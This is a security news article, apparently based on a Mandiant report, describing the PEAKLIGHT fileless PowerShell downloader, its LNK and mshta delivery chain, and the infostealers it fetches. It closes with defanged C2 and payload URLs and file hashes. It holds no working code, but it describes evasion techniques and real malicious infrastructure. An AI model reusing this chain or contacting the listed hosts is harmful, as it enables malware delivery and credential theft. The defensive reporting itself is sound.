Researchers Decoded Stealthy Memory Malware PEAKLIGHT

Cybersecurity analysts at Mandiant recently identified a stealthy memory malware dubbed “PEAKLIGHT.”

A Stealth memory malware is often referred to as fileless malware which resides only in a computer’s RAM and consequently evades normal antivirus solutions that work on disk scanning. 

This kind of malware does not have any clues on the hard drive, which makes its identification and removal difficult.

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial

Technical Analysis

This sophisticated multi-stage malware attack chain begins with movie-themed lures containing malicious Microsoft Shortcut (LNK) files. 

These LNK files execute obfuscated JavaScript droppers through system binary proxy execution (MITRE ATT&CK T1218.005) using forfiles.exe or PowerShell wildcards to launch mshta.exe. 

The dropper, obfuscated with decimal-encoded ASCII and String.fromCharCode(), decrypts and executes a PowerShell-based downloader dubbed PEAKLIGHT. PEAKLIGHT variants target either %AppData% or %ProgramData%, employing either hex-encoded (AES-CBC) or base64-encoded (AES-ECB with GZIP compression) payloads. 

According to the Mandiant report, It downloads and executes ZIP files (L1.zip/L2.zip or K1.zip/K2.zip) from content delivery networks (CDNs) like nextomax.b-cdn[.]net or potexo.b-cdn[.]net, containing infostealers such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.

There are evasion techniques which include memory-only execution, use of CDN to bypass security filters, and playing decoy video files (video.mp4) to make the user feel at ease.

However, the attack makes use of ActiveX objects (Wscript.shell) for system-level privileges as well as applies various PowerShell commands with -WindowStyle hidden, -ExecutionPolicy Unrestricted, and -NoProfile parameters to ensure stealth is maintained.

Moreover, this malware checks for already present files, downloads absent components, and acts payloads via custom functions which are responsible for File Operations, ZIP Extraction, and URL Deobfuscation.

PEAKLIGHT is a sophisticated, multi-stage obfuscated PowerShell-based downloader that checks for ZIP archives in hard-coded file paths and retrieves them from content delivery networks (CDNs) if absent.

It delivers payloads including LUMMAC.V2, SHADOWADDER, and CRYPTBOT. 

Multiple variants exist, each downloading specific archives (L1.zip, L2.zip, K1.zip, K2.zip) containing malicious components such as the Cryptbot infostealer, SHADOWLADDER malware configurations, and malicious DLLs (e.g., LiteSkinUtils.dll, WebView2Loader.dll). 

These archives also include legitimate executables (Setup.exe, aaaa.exe, Jfts.exe) for DLL side-loading.

The PEAKLIGHT malware makes use of utilities such as “More utility” (more.com) and comp.exe to drop additional files like AutoIt3 binaries such as Hofla.au3, Ufa.au3, and infostealer payloads like erefgojgbu, oqnhustu.

Various obfuscation and evasion techniques are used by the malware including system binary proxy execution, dynamic-link library (DLL) side-loading, and CDN abuse.

Some of the known command and control (C2) URLs include https://brewdogebar[.]com/code.vue and http://gceight8vt[.]top/upload.php which has a payload hosting domain at matodown.b-cdn[.]net.

PEAKLIGHT’s intricate structure with its evasion techniques points out that advanced detection methods and continuous monitoring in cybersecurity defenses are necessary.

Indicators of Compromise (IOCs)

Network-Based IOCs

PEAKLIGHT NBIs:
hxxps://fatodex.b-cdn[.]net/fatodex
hxxps://matodown.b-cdn[.]net/matodown
hxxps://potexo.b-cdn[.]net/potexo

LUMMAC.V2 C2s:
relaxtionflouwerwi[.]shop
deprivedrinkyfaiir[.]shop
detailbaconroollyws[.]shop
messtimetabledkolvk[.]shop
considerrycurrentyws[.]shop
understanndtytonyguw[.]shop
patternapplauderw[.]shop
horsedwollfedrwos[.]shop
tropicalironexpressiw[.]shop

CRYPTBOT C2s:
hxxp://gceight8vt[.]top/upload.php
hxxps://brewdogebar[.]com/code.vue

SHADOWLADDER:
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
hxxps://fatodex.b-cdn[.]net/K1.zip
hxxps://fatodex.b-cdn[.]net/K2.zip
hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
hxxps://matodown.b-cdn[.]net/K1.zip
hxxps://matodown.b-cdn[.]net/K2.zip
hxxps://nextomax.b-cdn[.]net/L1.zip
hxxps://nextomax.b-cdn[.]net/L2.zip
hxxps://potexo.b-cdn[.]net/K1.zip
hxxps://potexo.b-cdn[.]net/K2.zip

Host-Based IOCs

CRYPTBOT:
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)

LUMMAC.V2:
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)

PEAKLIGHT:
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3) 

SHADOWLADDER:
Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)
bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)
K1.zip (MD5: b6b8164feca728db02e6b636162a2960)
K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)
toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)